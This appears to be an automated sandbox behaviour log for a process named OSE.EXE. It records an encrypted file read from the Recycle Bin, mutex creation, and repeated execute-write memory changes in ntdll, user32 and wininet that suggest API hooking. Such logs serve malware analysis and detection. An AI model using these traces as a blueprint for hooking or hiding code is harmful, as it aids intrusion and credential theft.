Thread delayed Time: 0 TID: 6504 success or wait 2266195421
Thread delayed Time: 0 TID: 6504 success or wait 2267307097
Thread delayed Time: 0 TID: 6504 success or wait 2267310092
Thread delayed Time: 0 TID: 6504 success or wait 2267314432
Thread delayed Time: 0 TID: 6504 success or wait 2268425678
Thread delayed Time: 0 TID: 6504 success or wait 2268428566
Thread delayed Time: 0 TID: 6504 user apc 2353775492
Thread delayed Time: 0 TID: 6504 user apc 2354224344
Thread delayed Time: 0 TID: 6504 user apc 2354229178
Analysis File: OSE.EXE PID: 2000 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:15
Start date: 01/12/2011
Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
Commandline: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
Imagebase: 0x30000000
File size: 89136 bytes
MD5 hash: 7A56CF3E3F12E8AF599963B16F50FB6A
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\CRYPT32.dll write and read and execute unknown E80000 77824 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 BAE50FD
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1 BAE50FD
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\imm32.dll write and read and execute commit 520000 110592 own pid execute success or wait 1 BAE50FD
C:\WINDOWS\system32\imm32.dll write and read and execute commit 520000 110592 own pid execute success or wait 1 BAE50FD
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1 BAE50FD
\KnownDlls\WS2_32.dll write and read and execute unknown 76390000 118784 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 BAE50FD
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 540000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1 BAE50FD
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 900000 1056768 own pid execute success or wait 1 BAE50FD
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 900000 4096 own pid execute success or wait 1 BAE50FD
C:\WINDOWS\WindowsShell.Manifest query and read commit 900000 4096 own pid readonly success or wait 1 BAE50FD
C:\WINDOWS\WindowsShell.Manifest read commit 900000 4096 own pid readonly success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 900000 4096 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\shell32.dll read commit B20000 8462336 own pid readonly success or wait 1 BAE50FD
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\comctl32.dll read commit B30000 618496 own pid readonly success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown B30000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit B30000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit B30000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit B30000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit B30000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 6506B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
3224 2000 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE success or wait 1 650639
3252 2000 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE success or wait 1 BAD6140
3180 2000 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE success or wait 1 BAD6140
3248 2000 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE success or wait 1 BAD6140
3172 2000 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
12882 0s success or wait 228 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
3224 2000 success or wait 0 650279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 6505EC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2310654531
Thread created PID: 2000 TID: 3224 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Injected: false success or wait 2310657936
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2310659626
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: E80000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2310677557
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2310679289
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2310682568
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2310684361
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2310687230
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2310688258
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 520000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2310706915
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 520000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2310711621
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2310713905
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid object name not found 2310736010
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2310737580
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2310743100
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2310744737
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2310753812
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2310756419
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 540000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2310766786
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2310773456
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2310776189
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2310786223
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2310799099
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 900000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2310903156
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2310906791
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 900000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2310920343
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 900000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2310924384
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 900000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2310927213
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 900000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 2311054522
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2311057851
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2311061335
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: B20000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2311077074
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2311121268
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: B30000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2311135782
Thread created PID: 2000 TID: 3252 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Injected: false success or wait 2311151207
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2311152883
Thread delayed Time: 0 TID: 12882 success or wait 2311154286
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311154722
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311160409
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311162900
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311163195
Thread created PID: 2000 TID: 3180 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Injected: false success or wait 2311164855
Thread created PID: 2000 TID: 3248 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Injected: false success or wait 2311167739
Thread delayed Time: 0 TID: 12882 success or wait 2311170102
Thread delayed Time: 0 TID: 12882 success or wait 2311170502
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311170686
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311171766
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311176099
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311178586
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311178892
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311179201
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311180261
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311184272
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311186749
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311187052
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311187430
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311188481
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311192560
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311194964
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311196229
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311196749
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311197879
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311201922
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311204411
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311204718
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2311205716
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2311208093
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2311209448
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311224741
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311225863
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: B30000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2311230216
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311232832
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311234092
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311234495
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311235614
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311239948
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311242833
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311243134
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311243524
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311244600
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311249134
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311252076
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311252378
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311252841
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311253909
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311257980
